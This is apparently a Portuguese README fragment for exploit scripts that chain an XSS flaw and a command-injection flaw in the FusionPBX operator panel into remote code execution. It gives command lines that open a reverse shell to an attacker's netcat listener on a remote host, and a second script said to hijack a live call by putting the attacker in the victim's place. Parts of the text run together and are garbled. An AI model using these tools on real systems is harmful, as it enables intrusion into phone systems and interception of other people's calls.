
Encadeie CVE-2019-11408 – XSS no painel do operador e CVE-2019-11409 – Injeção de comando no painel do operador.
Este código simples tenta completar a implementação da vulnerabilidade encadeada introduzida por Dustin Cobb em RCE Using Caller ID – Multiple Vulnerabilities In FusionPBX.
netcat em um sistema remoto (rce_listener_address).python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}netcat e fornecerá um shell reversoEnquanto conhecemos Call-ID, from-tag e to-tag de uma chamada, executar o código abaixo substituirá você no lugar da vítima na chamada.
python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}